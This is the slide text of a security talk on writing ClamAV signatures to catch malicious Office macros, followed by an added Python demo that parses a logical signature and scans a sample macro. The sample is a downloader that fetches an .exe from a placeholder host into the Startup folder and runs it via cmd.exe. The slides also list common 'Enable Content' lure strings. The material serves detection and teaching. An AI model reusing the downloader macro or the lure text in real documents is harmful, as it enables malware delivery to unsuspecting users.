It's 2017: Weren't signature based technologies supposed to be dead by now? To the chagrin of many, signature based detection isn't an antiquated practice just yet. This presentation focuses on a signature based technology that has been around for a very long time: ClamAV, and how it can be practical / useful in today's security space. This talk will explore the current ClamAV capabilities, use cases, signatures, all with an emphasis on detecting malicious Office documents and exploits. Additionally, there will be an introduction to the open source project: 'clam-punch' which is a curated set of signatures for ClamAV to punch miscreants as well as a tool 'clamdigger' to assist analysts in creating their own signatures.
4. ClamAV 0.99+
• Yay, good reasons to use it!
• Updated functionality
• Decompression / unrolling of more filetypes!
• PCRE!
• Yara functionality!
• Yara -> ClamAV (with some exceptions)
• ClamAV decompression / unrolling + YARA logic == win
• Expanded sigtool functionality!
5. So.. why ClamAV?
• Why not? I just gave you some good reasons
• It’s free
• Some MTAs have Clam functionality built in
• Similar functionality to Yara, just does some other stuff better
• Quick triage of attachments
• Evil documents, macros, exploits, etc.
• Detection capabilities
• Track threats across the board
• Classify threats
• Known evil doc vs known evil macro inside a doc vs known Flash exploit
• Actor tracking
• APTz, Builders, Gangs, campaigns, etc
12. ClamAV for Malware Analysis
• Determine common doc social engineering lure text
• Used ~1,000 malicious docs
• Determined common strings using statistical analysis
• Most common:
• Document created in earlier version of Microsoft Office (Word|Excel)
• To (view|decrypt|display) this (content|document), please click "Enable Editing" (form|from) the yellow bar and then click "Enable Content"
• To properly display the document, please Enable Content.
• To display the contents of the document click on Enable Content button.
18. ClamAV for Analysts
• Run locally, using command line scanner
• Dissect raw macros within documents
• How does *ClamAV* see things?
• What if you don’t want to beautify/deobfuscate the macros?
• Built in tools
• sigtool
• clamscan
• External tools
• oletools
• viper
• Cuckoo
• lots more
19. clamscan
• Command line version of ClamAV
• $ clamscan -d rules.ldb attachment
• What I find most useful:
• --debug
• Provides a ton of useful information on the target file
• Also will provide information when a file is scanned
• --info
• Provides a ton of useful information on the target file
• --leave-temps
• Saves temp files generated during analysis
• UPX packed file -> saves compressed file
20. sigtool
• Swiss-army knife for ClamAV
• What I find most useful are:
• --vba
• Dumps out the raw macros inside of a document
• --html-normalise
• Creates an ascii output html/js file which is ‘normalized’ for how ClamAV will read it
• Removes case, whitespace, etc.
• --decode-sigs
• Reads sigs from stdin and decodes the signature contents
• --hex-dump
• Reads in from stdin and spits out hex dump
23. Detour: Sound Rule Writing Theory
• Know what you want to detect:
• Super specific content, ideally only one version of something (think hash, or very specific contents)
• Generic signature
• Detects a specific type of content, but with some wiggle room as far as things like variable names or domain names
• Loose / Heuristic Signature
• Detects abnormalities, or the presence of something in particular
• Sometimes INFO level, but other times a jumping-off point to hunt
• e.g. this APT uses this specific control to auto-run macros when the document opens
• Ideally, the perfect rule will be loose enough to allow slight changes, but specific enough to capture the right amount of maliciousness indicative of that specific threat
24. ClamAV Signatures
• Have you used YARA? It’s pretty similar
• Various types of ClamAV signatures, not limited to, but:
• hdb (hash database)
• Hash based signatures – simple
• ldb (logical database)
• Logical signatures – getting trickier now
• Boolean logic
• Regex
• Content modifiers
• Other types I’m not getting into, because these are the ones I find most useful
28. ldb signatures
• MiscreantPunch.EvilMacro.VBDL.170404;Engine:81-255,Target:2;(0&1&2&3&4&(5|6)&7&8&9&10);4174747269627574652056425f::i;55524c446f776e6c6f6164546f46696c65::i;5c50726f6772616d73::i;5c53746172747570::i;2e657865::i;2e72756e::i;7368656c6c::i;68747470::i;7/\x3a\/\/[^\x22\x27]+\.exe\b/si;433a::i;9/[^\x22\x27]+\.exe\b/si
• Fields, left to right:
• Signature name
• Engine compatibility, and Target type
• Logical expression
• Desired contents used for detection, as well as PCRE
• 0: Attribute VB_  1: URLDownloadToFile  2: Programs
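To make the field layout of that ldb line concrete, here is an added example (not code from the talk or from clam-punch) that parses the signature above, decodes its hex and PCRE subsignatures, and evaluates the logical expression against a constructed macro dump, the kind of text sigtool --vba prints. It assumes the PCRE bodies carried the usual backslash escapes (\x3a, \/, \b) that the slide text lost, handles only the &, | and () logic this signature uses, and matches against raw macro text rather than the OLE2 container that Target:2 selects in the real engine.

```python
import re

# Reconstruction of the slide's logical signature (constructed for this demo).
EVIL_MACRO_LDB = (
    "MiscreantPunch.EvilMacro.VBDL.170404;Engine:81-255,Target:2;"
    "(0&1&2&3&4&(5|6)&7&8&9&10);"
    "4174747269627574652056425f::i;55524c446f776e6c6f6164546f46696c65::i;"
    "5c50726f6772616d73::i;5c53746172747570::i;2e657865::i;2e72756e::i;"
    "7368656c6c::i;68747470::i;7/\\x3a\\/\\/[^\\x22\\x27]+\\.exe\\b/si;433a::i;"
    "9/[^\\x22\\x27]+\\.exe\\b/si")

def parse_ldb(sig):
    """Split one .ldb line into (name, target block, logical expression, subsigs)."""
    name, tdb, logic, *subs = sig.split(";")
    return name, tdb, logic, subs

def decode_subsig(sub):
    if "/" in sub:                                   # Trigger/PCRE/flags
        trigger, rest = sub.split("/", 1)
        body, flags = rest.rsplit("/", 1)
        fl = (re.I if "i" in flags else 0) | (re.S if "s" in flags else 0)
        return "pcre", int(trigger), re.compile(body.encode(), fl)
    hexbody, _, mods = sub.partition("::")           # hex[::modifiers], ::i = nocase
    return "hex", None, (bytes.fromhex(hexbody), "i" in mods)

def scan(sig, data):
    """Match every subsig against a raw macro dump, then evaluate the logic."""
    name, _, logic, subs = parse_ldb(sig)
    decoded = [decode_subsig(s) for s in subs]
    hits = {}
    for i, (kind, _, pat) in enumerate(decoded):
        if kind == "hex":
            needle, nocase = pat
            hits[i] = needle.lower() in data.lower() if nocase else needle in data
    for i, (kind, trigger, pat) in enumerate(decoded):  # PCREs run only once their trigger hit
        if kind == "pcre":
            hits[i] = hits.get(trigger, False) and pat.search(data) is not None
    # Only &, | and () are supported here; ClamAV's =,<,> count operators are not.
    if not re.fullmatch(r"[\d&|()]+", logic):
        raise ValueError("unsupported logical expression: " + logic)
    expr = re.sub(r"\d+", lambda m: str(hits[int(m.group())]), logic)
    return name, bool(eval(expr)), hits  # expr now holds only True/False, &, | and ()

# Constructed macro dump resembling a downloader doc (no real sample).
DOWNLOADER_MACRO = (
    b'Attribute VB_Name = "ThisDocument"\r\n'
    b'Private Declare Function URLDownloadToFile Lib "urlmon" (ByVal u As String) As Long\r\n'
    b'Sub AutoOpen()\r\n'
    b'    p = Environ("APPDATA") & "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\upd.exe"\r\n'
    b'    URLDownloadToFile 0, "http://example.invalid/payload.exe", p, 0, 0\r\n'
    b'    Shell "C:\\Windows\\System32\\cmd.exe /c " & p\r\n'
    b'End Sub\r\n')
```

The returned hits dictionary shows which subsig index failed, which is the first thing to check when a rule that should fire does not.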
35. Resources
• ClamAV Signature Docs (really important!)
• github.com/vrtadmin/clamav-devel/blob/master/docs/signatures.pdf
• Miscreant Punch Sigs
• github.com/wmetcalf/clam-punch
• Tutorial on sigwriting I made
• www.malwarefor.me/writing-signatures-for-clam-av-0-99-a-tutorial
• SaneSecurity 3rd party Sigs
• sanesecurity.com/usage/signatures
• ClamAV Mailing List
• lists.clamav.net/cgi-bin/mailman/listinfo/clamav-users
• Mal(?:doc|ware) Samples
• malware-traffic-analysis.net
• hybrid-analysis.com
• malwr.com
36. come hang w me (trainings)
• OISF Training – Denver, CO: June 20-21st
• Mix of Suricata User training with a kicker of signature development
• DerbyCon 7.0 – Louisville, KY: September 20-21st
• Practical Signature Development for Open Source IDS
• TL;DR how to write Suricata/Snort sigs that don’t suck :)
• SuriCon 2017 – Prague, CZ: November 15-17th
• https://suricon.net/
• CFP open (talk to me!)
• Sponsors needed! (support Open Source!)